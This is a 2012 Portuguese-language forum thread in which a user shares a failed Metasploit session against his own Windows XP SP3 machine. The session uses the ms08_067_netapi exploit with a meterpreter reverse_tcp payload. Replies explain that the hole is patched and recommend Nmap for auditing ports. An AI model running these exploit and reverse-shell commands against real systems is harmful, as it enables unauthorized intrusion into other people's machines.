metasploit framework no ubuntu

1. metasploit framework no ubuntu

Mac_BR
(usa Slackware)

Enviado em 24/09/2012 - 23:25h

boa noite galera, sou novo aqui no forum e andei testando o metasploit baixado para versão 32bits no metasploit.com e quando executo os comandos gostaria de saber o por que ele não vai mais além do que descrito abaixo.

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf exploit(ms08_067_netapi) > set target 58
target => 58
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.3:4444
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >

ps.: testei na minha rede particupar com um pc com windows xp sp3.

Se alguém puder me dar um help ficarei muito grato.

0 0

Quote

2. Re: metasploit framework no ubuntu

tiucs
(usa Debian)

Enviado em 25/09/2012 - 00:27h

O Metasploit não passa disso porque provavelmente a vulnerabilidade que você está tentando explorar já está corrigida no Windows que você está tentando invadir.
Normalmente a ms08_067_netapi funciona com Windows XP SP2. Se quiser continuar testando com o XP SP3 você pode procurar no site do Metasploit as vulnerabilidades que podem ser utilizadas nele, ou utilizar o Nmap pra procurá-las e depois explorar usando o Metasploit.

0 0

Quote

3. Re: metasploit framework no ubuntu

Mac_BR
(usa Slackware)

Enviado em 25/09/2012 - 13:09h

tiucs escreveu:

O Metasploit não passa disso porque provavelmente a vulnerabilidade que você está tentando explorar já está corrigida no Windows que você está tentando invadir.
Normalmente a ms08_067_netapi funciona com Windows XP SP2. Se quiser continuar testando com o XP SP3 você pode procurar no site do Metasploit as vulnerabilidades que podem ser utilizadas nele, ou utilizar o Nmap pra procurá-las e depois explorar usando o Metasploit.

o problema que eu não sei usar direito o metasploit porém eu já estou procurando bastante video aulas, artigos no forum e tudo mais, tenho 2 maquinas ligadas na rede e uma delas está instalada o ubuntu 12.04 e na outra windows xp sp3, aonde sofrendo ataques diretos na maquina do windows, por isto mesmo baixei o metasploit para eu mesmo entrar e poder fechar tudo o que preciso por um firewall, pois não posso fechar todas as portas dele, enfim, o que eu gostaria de saber como eu faço para entrar mesmo na maquina sendo ela xp sp3, para eu poder fechar a minha rede e evitar constrangimentos nesta parte, pois trabalhamos com muita coisa online por se tratar de importação e exportação.

Se puder me ajudar ficarei bastante grato.

0 0

Quote

4. Re: metasploit framework no ubuntu

tiucs
(usa Debian)

Enviado em 25/09/2012 - 22:41h

Mac_BR escreveu:

o problema que eu não sei usar direito o metasploit porém eu já estou procurando bastante video aulas, artigos no forum e tudo mais, tenho 2 maquinas ligadas na rede e uma delas está instalada o ubuntu 12.04 e na outra windows xp sp3, aonde sofrendo ataques diretos na maquina do windows, por isto mesmo baixei o metasploit para eu mesmo entrar e poder fechar tudo o que preciso por um firewall, pois não posso fechar todas as portas dele, enfim, o que eu gostaria de saber como eu faço para entrar mesmo na maquina sendo ela xp sp3, para eu poder fechar a minha rede e evitar constrangimentos nesta parte, pois trabalhamos com muita coisa online por se tratar de importação e exportação.

Se puder me ajudar ficarei bastante grato.

Se você precisa apenas verificar as portas e os serviços que estão rodando na máquina, creio que o Nmap irá te ajudar mais do que o Metasploit.
Dá uma lida no guia de referência do Nmap e veja se te ajuda: http://nmap.org/man/pt_BR/

0 0

Quote